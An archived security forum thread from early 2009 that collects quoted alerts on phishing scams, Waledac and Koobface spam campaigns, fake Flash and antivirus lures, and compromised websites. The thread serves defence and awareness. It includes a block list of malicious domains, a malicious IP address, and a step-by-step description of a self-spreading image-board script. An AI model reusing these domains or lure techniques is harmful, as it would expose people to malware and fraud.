01.06.2009 - "Websense... has discovered a phishing site emulating the Web site belonging to HM Revenue & Customs (HMRC), the UK government's taxation authority. The fake site is hosted in Denmark and uses the same stylesheet and graphics as the real HMRC Web site. Recipients first receive an email advising them that they are due a tax refund. This email contains a link to the phishing Web site. The phishing site aims to collect personal information such as name, address, and credit card information. Upon submitting the data, the user is redirected to the real HMRC site. The sending of the email is very timely with certain HMRC deadlines for online applications of tax returns imminent (31st January 2009). Websense has advised HMRC of this threat..."
(Screenshot of the phishing email available at the Websense URL above.)
:fear:
AplusWebMaster
2009-01-06, 18:05
FYI...
- http://blog.trendmicro.com/bogus-linkedin-profiles-harbor-malicious-content/
Jan. 5, 2009 - "The LinkedIn professional networking site connects more than 30 million users from across many different industries. The advantages of maintaining a list of trusted business contacts for career planning purposes is not lost on LinkedIn’s users. The fostering of business relationships is further enhanced by features such as LinkedIn Answers and access from mobile devices... found some bogus LinkedIn profiles which contain links to malware, using the names and images of famous personalities such as:
* Beyoncé Knowles
* Victoria Beckham
* Christina Ricci
* Kirsten Dunst
* Salma Hayek
* Kate Hudson
... and several others. Malicious links contained in these bogus profiles lead browsers through a series of redirections, but ultimately to malware. Note that there are several routes this infection path may take..."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2009-01-07, 13:58
FYI...
MLB.com pushing malware
- http://sunbeltblog.blogspot.com/2009/01/mlbcom-pushing-malware.html
January 06, 2009 - "... stay away from this site until they get it cleaned up. We are seeing various mlb sites redirecting to fake antivirus scan. These are almost certainly being done by malilcious flash advertisements. Not the first time* it’s happened (courtesy of Innovative Marketing**)."
(Screenshot available at the URL above.)
* http://www.security-forums.com/viewtopic.php?p=272589
** http://sunbeltblog.blogspot.com/2008/12/innovative-marketing-saga-continues.html
- http://www.theregister.co.uk/2009/01/08/major_league_baseball_threat/
8 January 2009 - "... Update: MLB spokesman Matthew Gould said the tainted ads were the result of an individual who claimed to sell ads through a company the website has done business with before. After the scam came to light, MLB officials discovered this individual had no affiliation with the company, which Gould declined to name because he says MLB is pursuing legal action. Gould said MLB officials believe the ads were taken down on Monday, less than 24 hours after going live. "As soon as we were made aware of the problem we removed the ad in all instances across our network," he said..." (Pop-up image for "Antivirus2009" shown at the URL above.)
:fear::fear::mad:
AplusWebMaster
2009-01-09, 16:08
FYI...
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090109
9 January 2009 - "...we have a bunch of new and interesting information on the trojan, much of which has come from a number of security researchers out there. However, we are just going to touch on the last item and give you an updated list of domains associated with Waledac. You are bound to see all kinds of great research and interesting findings from others on this soon. In the meantime, please use this information to protect your networks and proactively (and retroactively) block these hosts. The following are a list of domains known to be associated with Waledac. Most of these domains have been seen in the wild and may be posted elsewhere. However, we want to provide our research that we have collected ourselves in a central spot for anyone to see and share.
Please DO NOT visit these domains as they are distributing malware both through the files they are peddling and via exploits.
Waledac Domain Listing (several new ones since our 12-31 post):
bestchristmascard .com
bestmirabella .com
bestyearcard .com
blackchristmascard .com
cardnewyear .com
cheapdecember .com
christmaslightsnow .com
decemberchristmas .com
directchristmasgift .com
eternalgreetingcard .com
freechristmassite .com
freechristmasworld .com
freedecember .com
funnychristmasguide .com
greatmirabellasite .com
greetingcardcalendar .com
greetingcardgarb .com
greetingguide .com
greetingsupersite .com
holidayxmas .com
itsfatherchristmas .com
justchristmasgift .com
lifegreetingcard .com
livechristmascard .com
livechristmasgift .com
mirabellaclub .com
mirabellamotors .com
mirabellanews .com
mirabellaonline .com
newlifeyearsite .com
newmediayearguide .com
newyearcardcompany .com
newyearcardfree .com
newyearcardonline .com
newyearcardservice .com
smartcardgreeting .com
superchristmasday .com
superchristmaslights .com
superyearcard .com
themirabelladirect .com
themirabellaguide .com
themirabellahome .com
topgreetingsite .com
whitewhitechristmas .com
worldgreetingcard .com
yourchristmaslights .com
yourdecember .com
yourmirabelladirect .com
yourregards .com
youryearcard .com
Related Exploit Domains (no new ones listed):
seocom .name
seocom .mobi
seofon .net
Please feel free to distribute the above list as you see fit..."
:fear::mad::fear:
AplusWebMaster
2009-01-09, 20:56
FYI...
- http://www.us-cert.gov/current/#malware_circulating_via_email_messages
January 9, 2009 - "US-CERT is aware of public reports of malicious code circulating via spam email messages related to the Israel/Hamas conflict in Gaza. These messages may contain factual information about the conflict and appear to come from CNN. Additionally, the messages indicate that additional news coverage of the conflict can be viewed by following a link provided in the email body. If users click on this link, they are redirected to a bogus CNN website that appears to contain a video. Users who attempt to view this video will be prompted to update to a new version of Adobe Flash Player in order to view the video. This update is -not- a legitimate Adobe Flash Player update; it is malicious code. If users download this executable file, malicious code may be installed on their systems..."
- http://www.rsa.com/blog/blog_entry.aspx?id=1416
(Screenshot at the RSA URL above.)
:fear: :mad:
AplusWebMaster
2009-01-12, 17:17
FYI...
Yandex used in SPAM redirects
- http://sunbeltblog.blogspot.com/2009/01/yandex-used-in-spam-redirects.html
January 11, 2009 - "We’re seeing a fair number of pages on Narod (a service by that provides free web hosting, from Yandex, the Russian search engine). These are used for both redirects to malware, as well as redirects in spam... Administrators would be well advised to simply block any email or web traffic with narod .ru ."
:fear:
AplusWebMaster
2009-01-14, 23:48
FYI...
Malware directed at Classmates Online...
- http://securitylabs.websense.com/content/Blogs/3279.aspx
01.14.2009 - "Websense... noticed that a campaign against Classmates Online, Inc had broken out. We observed that thousands of URLs were registered in one day to spread the worm. The newly-registered URLs were unusually long, had several subdomains, and always contained some specific words such as process, multipart and so on... The new campaign was spread by email. The malicious email contained a link to a video invitation to reunite high school classmates and celebrate Classmates Day 2009. When the email recipient viewed the invitation, they downloaded a worm named Adobe_Player10.exe. This could fool a user into thinking they needed the latest version of the Adobe Player, prompting them to run the executable... the main purpose of this worm was to steal user information and send it to a server located in the Ukraine. The address of the server was hardcoded in the worm. The worm did a lot of work, including dropping a driver file to hide itself, injecting itself into every process, downloads and so on. It collected several kinds of information, including details about POP3, IMAP, ICQ, FTP, and certification from the user's MY certificate store, which is used to store trusted sites and personal certificates... The worm injected itself in every process. The injected code would enum a module of the process, and then hook some APIs into the module..."
(Screenshots available at the Websense URL above.)
:fear::fear:
AplusWebMaster
2009-01-15, 19:19
FYI...
Spam, Phishing, and Malware related to Presidential Inauguration
- http://www.us-cert.gov/current/#spam_phishing_and_malware_related
January 15, 2009 - "US-CERT has received reports of an increased number of phishing sites and spam related to the upcoming Presidential Inauguration. US-CERT reminds users that phishing and spamming campaigns often coincide with highly publicized events...
US-CERT encourages users and administrators to take the following preventative measures to help mitigate the security risks:
• Install antivirus software, and keep the virus signatures up to date.
• Do not follow unsolicited links and do not open unsolicited email messages.
• Use caution when visiting untrusted websites..."
- http://blog.trendmicro.com/fake-obama-news-sites-abound/
Jan 18, 2009
- http://www.f-secure.com/weblog/archives/00001585.html
January 17, 2009 - "...All the links point to a file called speech.exe, which is a Waledec malware variant..."
- http://blog.trendmicro.com/dont-be-fooled-by-obama-inauguration-scams/
January 16, 2009
:fear::mad:
AplusWebMaster
2009-01-19, 16:06
FYI...
3322 .org
- http://isc.sans.org/diary.html?storyid=5710
Last Updated: 2009-01-19 12:01:36 UTC - "...adding the 3322-dot-org domain to your block list would be a good idea. As you can tell from this diary* that we published in 2007, it is by far not the first time that this domain shows up on our malware radar ..."
* http://isc.sans.org/diary.html?storyid=3266
:fear::spider::fear:
AplusWebMaster
2009-01-19, 22:51
FYI...
- http://www.theregister.co.uk/2009/01/19/obama_quitsmlaware_spam_scam/
19 January 2009
- http://preview.tinyurl.com/79ay3a
17 January 09 (PandaLabs blog) - "Today we discovered a botnet controlled, fast-flux operated malware campaign impersonating the United States President-elect Barack Obama’s website. The fake website looks just like the real thing and attempts to bait viewers into clicking a story entitled, “Barack Obama has refused to be a president”. When the user clicks on the link, the malware (W32\Iksmas.A.worm) begins to download all of the necessary files needed to host the fake site on the victims computer... The attack appears to have originated from China as the domains were purchased from a Chinese domain registrar called XINNET TECHNOLOGY CORPORATION. Xinnet has a history of abuse problems and we have contacted them to remove the domain names... The file names of the malware are:
• doc.exe , statement.exe , obamaspeech.exe , blog.exe , barack.exe , usa.exe , baracknews.exe , pdf.exe , news.exe , obamasblog.exe , barakblog.exe , statement.exe , president.exe , obamanews.exe ..."
:fear::spider::fear:
AplusWebMaster
2009-01-20, 20:33
FYI...
Inauguration Themed Waledac - New Tactics & New Domains
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090119
January 19, 2009 - "...the Inauguration of Barack Obama and the Waledac trojan has been in full swing attempting to take advantage of the event. Since late last week the trojan has been blasting its way across the Internet with e-mails attempting to bring unwitting users to a page that looks a lot like the official Barack Obama website. The page is updated each day to appear to have a new blog entry... As always do NOT visit these domains as they are malicious and hosting exploit code... Click here* for a full listing of Waledac domains that we are aware of - this link will be updated as we get them. Your best bet is to block these domains or otherwise avoid them..."
* http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
:fear::spider::mad:
AplusWebMaster
2009-01-21, 14:32
FYI...
Phishing Alert - Canada Revenue Agency
- http://securitylabs.websense.com/content/Alerts/3282.aspx
01.20.2009 - "Websense... has discovered phishing sites spoofing the Web site belonging to Canada Revenue Agency (CRA), the Canadian government’s taxation authority. The fake site is hosted in Germany and uses the same stylesheet and graphics as the real CRA Web site. The phishing site aims to collect personal information such as the victim’s social insurance number, full name, address, date of birth, mother’s maiden name, and credit card information. Upon submitting the data, the user is redirected to the real CRA site. This campaign is timed to coincide with the upcoming CRA deadline for online tax return applications..."
:fear::mad:
AplusWebMaster
2009-01-23, 13:52
FYI...
United Airlines - e-mail scam malware attack
- http://www.sophos.com/blogs/gc/g/2009/01/19/united-airlines-malware-attack/
January 19, 2009 - "Last week... spammers were sending out emails posing as messages from Northwest Airlines*. The attached file was not an electronic airline ticket of course, but a Trojan horse designed to infect your computer. As anticipated, the hackers have made a simple switch - changing the bait from a Northwest Airlines email to one claiming to come from United Airlines, and spoofing the email address tickets@united .com ... As before, opening the ZIP file is a very bad idea. Although it’s understandable that you might panic into thinking that your credit card has been debited without your permission, for a flight you don’t want or need, you should be cynical enough to smell this for what it is - a dirty rotten scam designed to infect your personal computer."
* http://www.sophos.com/blogs/gc/g/2009/01/14/northwest-airlines-malware-attack/
(Screenshots available at both URLs above.)
Video: http://www.sophos.com/blogs/gc/g/2008/08/01/video-the-e-ticket-email-malware-campaign
:fear: :mad:
AplusWebMaster
2009-01-26, 22:13
FYI...
Valentine SPAM already!...
- http://blog.trendmicro.com/waledac-loves-to-spam-you/
Jan. 26, 2009 - "Holidays and popular annual events as a social engineering tool in spamming is a signature Storm technique. The following spammed email message should then cement WALEDAC’s association with the said bot giant...
Spammed Valentine’s greetings.
These messages flood inboxes weeks before Valentine’s day, also typical of previous Storm spam runs. Clicking on the link redirects a user to a site with a heart images. When this page is clicked, the user is prompted to download a file, malicious of course, detected by Trend Micro as WORM_WALEDAC.AR... Beside the social engineering techniques used in email, following are the similar methods applied by this worm family:
• Fast-flux networks and several different name servers used per domain
• Files names ecard.exe and postcard.exe
• In some instances, the installation of rogue antispyware ..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-01-27, 18:39
FYI...
IEC website compromised
- http://securitylabs.websense.com/content/Alerts/3289.aspx
01.27.2009 - "Websense... has discovered that a subdomain of the International Electrotechnical Commission (IEC) Web site has been compromised. The IEC is an international standards organization that prepares and publishes International Standards for all electrical, electronic, and related technologies... The infected subdomain belongs to the TC26 group. Unprotected users would be subjected to execution of obfuscated Javascript that -redirects- to an exploit site, hosting exploits for Internet Explorer, QuickTime and AOL SuperBuddy. Successful execution of the exploit code incurs a drive-by download. This installs a backdoor on the compromised machine. Major antivirus vendors are -not- detecting this payload..."
(Screenshots available at the URL above.)
:fear::fear:
AplusWebMaster
2009-01-28, 18:05
FYI...
Fed Reserve Bank phish-about-phish
- http://www.hoax-slayer.com/federal-reserve-bank-scam-emails.shtml
28 January 2009 - "Email purporting to be from the Federal Reserve Bank claims that U.S. Treasury Department has imposed restrictions on federal wire transfers due to a widespread phishing attack... Email is -not- from the Reserve Bank - Links lead to bogus websites... The FDIC published an alert* about the scam..."
* http://www.fdic.gov/news/news/SpecialAlert/2009/sa09020.html
FDIC: SA-20-2009 January 15, 2009
:fear::mad:
AplusWebMaster
2009-01-28, 22:28
FYI...
- http://www.pcmag.com/article2/0,2817,2339712,00.asp
01.27.09 Larry Seltzer - "...AVG has released research that indicates the number and volatility of web sites serving malicious code is increasing dramatically... Almost 60% of these sites are up for less than one day. The goal of these techniques seems to be to defeat blacklist-based protections. AVG calls them transient threats. What are these web pages? Few are actually put up to serve malware. Some of them are blog comments, some are advertisements, many are legitimate web sites corrupted through HTML/script injection, and many have been corrupted through compromises of SQL servers through SQL injection. These compromised web sites are tricked into redirecting users to the few sites that directly serve the malware. The combination of the Apache web server and PHP scripting engine are a favorite target of attackers. There are large numbers of vulnerabilities for attackers to exploit and no automated patch system to make sure servers are protected... The actual malware being served varies from fake codecs, game password-stealing attacks to fake anti-spyware. The fake codec sites are the most volatile, with 62% active for less than a day. The fake anti-spyware sites are more stable, but 28% are active less than a day and the average is less than 2 weeks..."
:fear::mad:
AplusWebMaster
2009-02-04, 21:05
FYI...
Work-At-Home Scams...
- http://www.ic3.gov/media/2009/090203.aspx
February 3, 2009 - "Consumers need to be vigilant when seeking employment on-line. The IC3 continues to receive numerous complaints from individuals who have fallen victim to work-at-home scams. Victims are often hired to "process payments", "transfer funds" or "reship products." These job scams involve the victims receiving and cashing fraudulent checks, transferring illegally obtained funds for the criminals, or receiving stolen merchandise and shipping it to the criminals. Other victims sign up to be a "mystery shopper", receiving fraudulent checks with instructions to cash the checks and wire the funds to "test" a company's services.
Victims are told they will be compensated with a portion of the merchandise or funds. Work-at-home schemes attract otherwise innocent individuals, causing them to become part of criminal schemes without realizing they are engaging in illegal behavior. Job scams often provide criminals the opportunity to commit identity theft when victims provide their personal information, sometimes even bank account information to their potential "employer." The criminal/employer can then use the victim's information to open credit cards, post on-line auctions, register Web sites, etc., in the victim's name to commit additional crimes..."
:fear::mad:
AplusWebMaster
2009-02-05, 15:22
FYI...
- http://blog.wired.com/27bstroke6/2009/02/atm.html
February 03, 2009 - "A carefully coordinated global ATM heist last November resulted in a one-day haul of $9 million in cash, after a hacker penetrated a server at payment processor RBS WorldPay... RBS WorldPay announced on December 23 that they'd been hacked, and personal information on approximately 1.5 million payroll-card and gift-card customers had been stolen. (Payroll cards are debit cards issued and recharged by employers as an alternative to paychecks and direct-deposit.) Now we know that account numbers and other mag-stripe data needed to clone the debit cards were also compromised in the breach. At the time, the company said it identified fraudulent activity on only 100 cards, making it sound like small beans. But it turns out the hacker managed to lift the withdrawal limits on those 100 cards, before dispatching a global army of cashers to drain them with repeated rapid-fire withdrawals. More than 130 ATMs in 49 cities from Moscow to Atlanta were hit simultaneously just after midnight Eastern Time on November 8. A class action lawsuit has been filed against RBS WorldPay on behalf of consumers..."
(Video available at the Wired URL above.)
- http://voices.washingtonpost.com/securityfix/2009/02/data_breach_led_to_multi-milli.html
February 5, 2009 - "...some $50 million was lost to ATM fraud in New York City alone over the course of one month last year..."
:mad::sick:
AplusWebMaster
2009-02-08, 02:16
FYI...
- http://isc.sans.org/diary.html?storyid=5821
Last Updated: 2009-02-07 21:51:03 UTC - "A Storm Center subscriber has just submitted malware embedded in .gif image files, downloaded from the image site 4chan.org. For the sake of expediency, and because this person did such a good write up, here is the analysis provided:
"The *.gif files were found (on) the "random" board of the image board site 4chan. The files contain a large picture with instructions to save the file with a .jse extension and run it. The *.out files are the result of applying scrdec to the gifs to reveal the encoded script. It appears to:
1) copy itself somewhere as 'sys.jse'
2) add itself to a Run key in the registry
3) a) fetch the index to 4chan's /b forum
b) download the first image
c) save it as 'j.jse'
d) attempt to run 'j.jse'
4) construct a POST request containing the image as payload
5) upload itself as a new post on 4chan
6) point an instance of IE at site it came from
(3)-(6) are in an infinite loop."
To the subscriber who did the legwork on this one, my thanx for the excellent work... will provide more data as it develops."
:fear::mad::fear:
AplusWebMaster
2009-02-10, 00:33
FYI...
Waledac new variant - Valentine's Day Theme
- http://securitylabs.websense.com/content/Alerts/3299.aspx
02.09.2009 - "... new spammed variant continues to use the Valentines theme. Once a user opens the URL in the spammed message, he is redirected to a site with 2 puppies and a love heart to give a Valentines theme. The user is then enticed to download a Valentines kit to prepare a present for a loved one, which is a new Waledac variant. This variant has a very low AV detection rate..."
- http://www.trustedsource.org/blog/182/New-Valentine-Scam-on-the-Loose
(Screenshot of spammed email available at both URLs above.)
Waledac Domain (Block) List - Updated 02-10-2009 - 4:21 UTC
- http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
- https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/239
02-09-2009 - "Up until recently, Waledac’s main purpose had been to peddle performance-enhancing pharmaceuticals by sending large runs of unsolicited mail to thousands of unwilling recipients. Today we noticed a shift in this trend. In addition to sending large volumes of spam, Waledac is now distributing misleading applications. In our testing we noticed that the misleading application that is installed this time around is MS AntiSpyware 2009..."
:fear::mad:
AplusWebMaster
2009-02-13, 02:25
FYI...
Skype Valentine SPAM lure
- http://securitylabs.websense.com/content/Alerts/3305.aspx
02.12.2009 - "Websense... has spotted an emerging malicious spam lure, masquerading as a message from Skype. The spammed message uses Skype's logos and themes, posing as a Valentine promotion. With two days to go before Valentine's day, the fake promotion entices the user into sending a free Valentine video message to a loved one. The proposed video link in the message leads to a malicious compressed archive file named valentine.exe... Earlier today we noticed that the same group were sending out spoofed-Hallmark e-greetings and now they have recently switched to this spoofed-Skype video card campaign..."
(Screenshots of a spammed email available at the URL above.)
:fear::mad:
AplusWebMaster
2009-02-14, 15:24
FYI...
- http://blog.trendmicro.com/waledac-spreads-more-malware-love/
Feb. 13, 2009 - "... A recently reported case of malware-related SPAM contains a short Valentine’s message — and with an embedded URL that leads to malicious content... The malicious file is actually a WALEDAC variant detected... WALEDAC variants* have been previously served through e-card spam..."
(Screenshots available at the URL above.)
Search Results for 'WALEDAC' - MALWARE and GRAYWARE List
* http://preview.tinyurl.com/akubv6
...42 records match your query
Waledac Tracker Summary Data
- http://www.sudosecure.net/waledac/index.php
2009-02-14
:fear::mad:
AplusWebMaster
2009-02-18, 04:55
FYI...
Re-resurgence of .cn URL SPAM
- https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/spam/article-id/148
02-17-2009 - "As discussed in the Symantec State of Spam Report* for February, URLs with the “.cn” country code top level domain (ccTLD) have become a popular ingredient in spam messages. A top-level domain (TLD) is the part of a domain name that follows the final dot of any domain name. A ccTLD is a top-level domain generally reserved or used by a country or a dependent territory. According to the February report, URLs with .cn ccTLDs accounted for approximately 32% of all URLs seen during that period. However, we saw a noticeable decrease in this particular technique starting around the end of January with levels dropping down to 7%. On February 12, we once again observed a revival approaching similar levels as was seen in January—these levels are currently sitting around 29%. The URLs are applied to various kinds of spam attacks, but one of the more popular versions uses legitimate messages such as newsletters and replaces the existing URLs with .cn URLs to peddle spam products..."
* http://www.symantec.com/business/theme.jsp?themeid=state_of_spam
___
SPAM Attacks on Job Seekers
- https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/spam/article-id/147
02-17-2009 - "With the worsening economic situation, unemployment figures have risen worldwide. This has led millions of people to search for jobs, using whatever resources they can find. One of the most common is online job search sites. Email alerts from recruitment agencies are anxiously viewed for future job prospects and hopes dashed when rejection letters are received. Malicious code writers are making use of this opportunity to distribute their malware. Symantec has recently observed emails with malicious attachments, informing the recipient of a job rejection and including an attached copy of their purported application. These emails pose as though they have been sent from a genuine recruitment agency... The attached zip file “copy of your CV.zip” contains an executable file, detected as Hacktool.Spammer by Symantec Antivirus. Hacktool.Spammer is a program that hackers use to attack mail boxes by flooding them with email. It can be programmed to send many email messages to specific addresses. It will be difficult to ignore emails from job agencies, but we can definitely be cautious of file types, particularly executables (.exe). -Any- email with this type of application extension should be considered suspicious, particularly if it's coming from an unknown sender. We have also seen job offer attacks with an intention of harvesting email addresses. If the recipient clicks on any of the links found in the message, the spammer gets a confirmation that the email address is a live account. This account can then be targeted in a spam campaign at a later date. Clicking an "unsubscribe" link also yields the same results, because in the action of unsubscribing you are confirming the account is a live address..."
:mad: :fear: :buried:
AplusWebMaster
2009-02-23, 23:24
FYI...
eBay Auction Tool Web Site Infected With Malware
- http://preview.tinyurl.com/d6a9xm
Feb. 23, 2009 PC World - "A Trojan horse lurking on servers belonging to Auctiva.com, a Web site offering eBay auction tools, infected people's PCs last week. The problem became very public when Google's malware warning system kicked in as people tried to browse the site, saying Auctiva was infected with malware. Google will display an interstitial page warning people of certain Web sites known to contain malware. "It appears the reason these virus alert warnings started showing up on our site is because some of our machines were injected with malware originating in China," according to a post on Auctiva's community forum... It appears that the malware targeted Microsoft's Internet Explorer browser... "Found eight Trojans on my system that seemed to have snuck through my on-access protection, or maybe because, like a fool, I clicked 'ignore the warning' to get to Auctiva's front page," wrote one user on Auctiva's forum. If Google displays a warning about a dangerous Web site, it still gives people the option of browsing to the site. Auctiva said it was working with Google to ensure the warning is not displayed now that it has cleaned up its servers. However, people who browsed Auctiva between Thursday and Saturday afternoon until 2 p.m. Pacific time should ensure their machines are not infected..."
:fear::lip:
AplusWebMaster
2009-02-27, 14:48
FYI...
Rogue Facebook apps...
- http://blog.trendmicro.com/a-second-rogue-facebook-application-in-just-a-week/
Feb. 26, 2009 - "In a second attack, extremely reminiscent of the one that took place this weekend*, Facebook users have once again been victimized by cybercriminals. Reports started surfacing this afternoon of yet another rogue Facebook application posting notifications to user profiles... The link in the notification led on to an application named f a c e b o o k - - closing down!!! which, once installed, would proceed to spam all of the affected user’s friends with the same message. It may also harvest personal information along the way... Prevention of rogue applications with extremely dubious intent to propagate freely within the site is needed. Users are advised to exercise extreme caution when surfing..."
* http://blog.trendmicro.com/rogue-facebook-app-linked-to-blackhat-seo/
(Screenshots available at both URLs above.)
:fear:
AplusWebMaster
2009-03-02, 18:20
FYI...
- http://blog.trendmicro.com/new-variant-of-koobface-worm-spreading-on-facebook/
March 1, 2009 - "I just received a Facebook message from a friend; it was a pretty standard one that is beginning to look familiar to a lot of us I am sure. What surprised me though, was the page that the link led to. On the face of it is a very familiar looking spoofed version of YouTube, complete with bogus comments from “viewers”... Take a second look though, the link had taken me to a site supposedly hosting a video posted by the same person that I had received the Facebook message from. In fact not only was the malicious landing page displaying his name, it had also pulled the photo from his Facebook profile.... Clicking the Install button redirects to a download site for the file setup.exe which is the new Koobface variant detected as WORM_KOOBFACE.AZ. It is hosted on an IP address in another part of the world, and in the last hour, we’ve seen 300+ different unique IP addresses hosting setup.exe and we’re expecting more. All seen IP addresses hosting the said malicious file are now detected as HTML_KOOBFACE.BA. Analysis by our engineers reveal that WORM_KOOBFACE.AZ propagates through other social networking sites as well..."
(Screenshots available at the URL above.)
- http://www.us-cert.gov/current/index.html#malicious_code_targeting_social_networking
March 4, 2009 - "...malicious code spreading via popular social networking sites including myspace.com, facebook.com, hi5.com, friendster.com, myyearbook.com, bebo.com, and livejournal.com. The reports indicate that the malware, named Koobface, is spreading through invitations from a user's contact that include a link to view a video. If the users click on the link in this invitation, they are prompted to update Adobe Flash Player. This update is not a legitimate Adobe Flash Player update, it is malicious code..."
:fear::mad:
AplusWebMaster
2009-03-04, 13:29
FYI...
- http://www.f-secure.com/weblog/archives/00001619.html
March 4, 2009 - "Online criminals regularly post their ads on YouTube, looking for buyers for their products. Some recent examples... (Screenshots at the URL above.) No big surprises there. A bit more surprisingly, when you want to report such videos to YouTube admins, they actually don't have an option for reporting criminal use..."
- http://www.internetnews.com/security/print.php/3808326
March 3, 2009 - "... In both the Digg and YouTube attacks, links claim to take visitors to a video. Instead, they redirect them to one of several sites that then download malware like the Adware/Videoplay worm. The worm steals cookies, passwords, user profiles and e-mail account information and sends these to a remote site over the Internet. It can also make copies of itself in removable media to spread further. The links can also direct users to download fake antivirus software..."
- http://pandalabs.pandasecurity.com/archive/Metatags-in-malware-websites.aspx
:fear::mad::fear:
AplusWebMaster
2009-03-05, 17:58
FYI...
Fake job ads up 345%...
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=215800622
March 5, 2009 - "Job seekers beware. Identity thieves are looking to steal personal information from those searching for employment. Fake job ads are up 345% over the past three years, according to the U.K. Association for Payment Clearing Services, and the Identity Theft Resource Center (ITRC)* warns that would-be workers should be careful about providing personal information to purported employers..."
* http://preview.tinyurl.com/2j6y3b
:fear::mad:
AplusWebMaster
2009-03-06, 14:12
FYI...
Scams - Economic Stimulus email and websites...
- http://www.us-cert.gov/current/#economic_stimulus_email_and_website
March 5, 2009 - "... economic stimulus scams circulating. These scams are being conducted through both email and malicious websites. Some of the email scam messages request personal information, which can then be used for identity theft. Other email scam messages offer to deposit the stimulus funds directly into users' bank accounts. If users provide their banking information, the attackers may be able to withdraw funds from the users' accounts. The website scams entice users by claiming that they can help them get money from the stimulus fund. These websites typically request payment for their services. If users provide their credit card information, the attackers running the malicious sites may make unauthorized charges to the card, or charge users more than the agreed upon terms..."
- http://ftc.gov/opa/2009/03/stimulusscam.shtm
:fear::spider::fear:
AplusWebMaster
2009-03-09, 19:31
FYI...
Fake Windows Support SPAM... Info-Stealer
- http://blog.trendmicro.com/fake-windows-support-spam-brings-forth-an-info-stealer/
Mar 9, 2009 - "... Spammed email messages were found pretending to come from Microsoft Windows Support and claiming that Microsoft Service Pack 1 and Service Pack 2 have been discovered to have an error that can damage the computer’s software or even the hardware. These messages encourage users to download and install a file in order to fix the problem. When users click the download button they are redirected to a site and are asked to download a file which Trend Micro detects as TROJ_DLOADER.CUT... TROJ_DLOADER.CUT connects to a certain URL to download another malicious file, which in turn is detected by Trend Micro as TSPY_BANKER.MCL. TSPY_BANKER.MCL monitors the affected user’s online transactions and steals banking related information. Not too many TSPY_BANKER variants have been reported to be related to notable attacks recently, and this incident may pretty much mark the end of the hiatus. Users are advised to ignore spammed messages and, more importantly, to never click links embedded in these messages..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2009-03-10, 16:13
FYI...
- http://preview.tinyurl.com/dn8vkj
March 9, 2009 PandaLabs blog - "Today we're announcing results of a study that analyzed 67 million computers in 2008 and revealed that 1.1 percent of the worldwide population of Internet users have been actively exposed to identity theft malware. We predict that the infection rate will increase by an additional 336 percent per month throughout 2009, based on the trend of the previous 14 months. Here are the highlights from our study on the evolution of online identity theft:
• Over three million of the audited users in the U.S. and more than 10 million users worldwide were infected with active identity theft-based malware last year.
• 1.07% of all PCs scanned in 2008 were infected with active malware (resident in memory during the scan) related to identity theft, such as banker Trojans.
• 35% of the infected PCs had up-to-date antivirus software installed.
• The number of PCs infected with identify theft malware increased by 800 percent from the first half of 2008 to the second half.
• Arizona, California and Florida continue to be the states with the highest per-capita incidence of reported identity theft.
Active malware means malware that is loaded into the PC's memory and actively running as a process. For example, users of PCs infected with this type of identity theft malware who utilize online services such as shopping, banking, and social networking, have had their identities stolen in some fashion. According to the Federal Trade Commission (FTC), the average time victims spend resolving identity theft issues is 30 hours per incident. The cumulative cost in hours alone from identity theft related malware based on Panda Security's projected infection rate could reach 90 million hours..."
:fear::mad:
AplusWebMaster
2009-03-13, 16:02
FYI...
- http://blog.trendmicro.com/tinyurl-phishing-becoming-popular/
Mar. 13, 2009 - "... We previously blogged about similar phishing operations that used this exact technique to trick users into thinking links are legitimate:
• http://blog.trendmicro.com/not-so-tiny-phishing/
• http://blog.trendmicro.com/tinyurl-now-used-in-im-phishing/
...Substituting preview.tinyurl.com* for tinyurl.com also allows users to get a preview of the final link."
* http://tinyurl.com/preview.php
"Don't want to be instantly redirected to a TinyURL and instead want to see where it's going before going to the site? Not a problem with our preview feature..."
:bigthumb:
AplusWebMaster
2009-03-13, 22:43
FYI...
Malicious spam run(s), again...
- http://www.f-secure.com/weblog/archives/00001625.html
March 13, 2009 - "The type of spam runs we saw late last year (Obama and BofA) are starting to pick up again in volume. We've seen Classmates being used as a theme and two days ago it was fake Facebook messages. Today it's back to fake Bank of America certificates... As in all previous spam runs it leads to a site prompting you to download a fake Adobe Flash player. This malware steals confidential information and sends it to a web server. In previous attacks this server was in Ukraine but it has now been moved to Hong Kong. If you see network traffic to the IP address 58.65.232.17 it's a bad sign."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2009-03-16, 16:24
FYI...
- http://securitylabs.websense.com/content/Alerts/3321.aspx
03.16.2009 - "Websense... has detected yet another new Waledac campaign theme in the wild. The new variant uses a Reuters theme as a social engineering mechanism to report a bogus news item relating to a 'bomb explosion'. The malicious Web sites in the current attack are socially engineered to report the geolocation of the incident corresponding to the user's IP address. They encourage users to view a video supposedly related to the news report. When users click on the video or the link below the video, they are advised to download the latest version of Flash Player. This leads to the download of Waledac variants. The theme includes legitimate links corresponding to Wikipedia and Google which are presented in a 'Related Links' section of the attack Web sites. Those legitimate links are used to target unsuspecting users in order to increase chances of success with the attack..."
- http://blog.trendmicro.com/waledac-localizes-social-engineering/
Mar. 16, 2009
- http://www.sophos.com/security/blog/2009/03/3541.html
15 March 2009
(Screenshots available at each URL above.)
:fear::mad:
AplusWebMaster
2009-03-18, 22:26
FYI...
- http://blog.trendmicro.com/online-risks-thrive-despite-a-down-economy/
Mar. 17, 2009 - "...TrendLabs reports more than a twenty-fold (2000 percent) increase in web threats between the beginning of 2005 and the end of 2008... for 2008 over 90 percent of all digital threats arrive at their targets via the Internet... from January until November 2008, a staggering 34.3 million PCs were infected with botnet-related malware..."
Trend Micro 2008 Annual Threat Roundup and 2009 Forecast
- http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/trend_micro_2009_annual_threat_roundup.pdf
3.26MB PDF file
:fear::blink::fear:
AplusWebMaster
2009-03-20, 12:32
FYI...
SPAM - fake Comcast, Facebook e-mails
